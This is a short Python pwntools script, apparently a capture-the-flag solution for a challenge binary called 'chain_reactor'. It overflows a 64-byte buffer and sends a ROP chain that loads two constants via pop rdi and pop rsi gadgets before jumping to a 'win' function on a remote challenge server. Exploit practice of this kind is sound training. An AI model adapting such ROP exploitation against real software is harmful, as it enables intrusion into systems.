25 lines
521 B
Python
25 lines
521 B
Python
from pwn import *
|
|
|
|
OFF = 64
|
|
pop_rdi = 0x000000000040121F
|
|
pop_rsi = 0x0000000000401221
|
|
ret = 0x000000000040101A
|
|
var1 = 0xC0FFEE
|
|
var2 = 0xBADC0DE
|
|
win = 0x0000000000401226
|
|
context.binary = elf = ELF("./chain_reactor", checksec=False)
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13510)
|
|
print(p.recvuntil(b"[chain-reactor] Enter activation codes: "))
|
|
payload = flat(
|
|
b"A" * 64,
|
|
p64(ret),
|
|
p64(pop_rdi),
|
|
p64(var1),
|
|
p64(pop_rsi),
|
|
p64(var2),
|
|
p64(win),
|
|
)
|
|
p.sendline(payload)
|
|
p.interactive()
|